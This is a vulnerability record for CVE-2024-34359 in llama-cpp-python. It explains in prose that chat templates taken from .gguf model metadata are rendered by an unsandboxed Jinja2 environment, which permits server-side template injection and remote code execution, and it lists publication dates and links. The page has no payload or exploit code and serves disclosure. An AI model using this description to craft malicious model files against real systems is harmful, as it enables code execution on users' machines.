llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from targeted `.gguf` 's Metadata and furtherly parses it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. Nevertheless, `Jinja2ChatFormatter` parse the `chat template` within the Metadate with sandbox-less `jinja2.Environment`, which is furthermore rendered in `__call__` to construct the `prompt` of interaction. This allows `jinja2` Server Side Template Injection which leads to remote code execution by a carefully constructed payload.
Metrics
Affected Vendors & Products
References
History
No history.
MITRE
Status: PUBLISHED
Assigner: GitHub_M
Published: 2024-05-10T17:07:18.850Z
Updated: 2024-08-02T02:51:10.739Z
Reserved: 2024-05-02T06:36:32.439Z
Link: CVE-2024-34359
Vulnrichment
Updated: 2024-08-02T02:51:10.739Z
NVD
Status : Awaiting Analysis
Published: 2024-05-14T15:38:45.093
Modified: 2024-05-14T16:12:23.490
Link: CVE-2024-34359
Redhat
No data.